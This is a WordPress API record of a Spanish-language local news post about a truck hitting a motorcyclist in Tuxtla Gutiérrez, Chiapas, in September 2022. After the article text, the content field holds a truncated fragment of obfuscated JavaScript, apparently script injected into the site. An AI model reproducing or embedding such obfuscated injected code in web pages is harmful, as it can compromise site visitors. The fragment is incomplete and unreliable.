{"id":5112,"date":"2022-09-15T01:27:14","date_gmt":"2022-09-15T01:27:14","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5112"},"modified":"2022-09-15T01:27:15","modified_gmt":"2022-09-15T01:27:15","slug":"impactan-a-motociclista-en-la-24-de-junio","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5112","title":{"rendered":"Impactan a motociclista en la 24 de Junio"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1663205113023-1024x768.jpg\" alt=\"\" class=\"wp-image-5113\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1663205113023-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1663205113023-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1663205113023-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1663205113023.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 14 de septiembre del 2022. Tuxtla Guti\u00e9rrez.- Un motociclista fue embestido por una camioneta este jueves en la zona Oriente Norte de Tuxtla Guti\u00e9rrez.Los reportes de tr\u00e1nsito informaron que todo ocurri\u00f3 cuando la camioneta Ford Ranger de color Blanco circulaba sobre el Callej\u00f3n Vecinal cuando a la altura de Los Manguitos un motociclista se atraves\u00f3 de manera repentina y no pudo evitar la colisi\u00f3n.Por el golpe el motociclista sali\u00f3 volando y se impact\u00f3 contra el pavimento.La versi\u00f3n del motorista inform\u00f3 que, corr\u00eda de Norte a Sur y al incorporarse al peque\u00f1o bulevar no puedo frenar.Al lugar arribaron param\u00e9dicos para valorar y trasladar al herido a un nosocomio.Agentes de tr\u00e1nsito se encargaron de ordenar el levantamiento de las unidades que fueron trasladadas a un corral\u00f3n en turno para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 14 de septiembre del 2022. Tuxtla Guti\u00e9rrez.- Un motociclista fue embestido por una camioneta este jueves en la zona Oriente Norte de Tuxtla Guti\u00e9rrez.Los reportes de tr\u00e1nsito informaron que todo ocurri\u00f3 cuando la camioneta Ford Ranger de color Blanco circulaba sobre el Callej\u00f3n Vecinal cuando a la altura de Los Manguitos un &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5113,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-5112","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5112","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5112"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5112\/revisions"}],"predecessor-version":[{"id":5114,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5112\/revisions\/5114"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5113"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5112"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5112"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5112"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}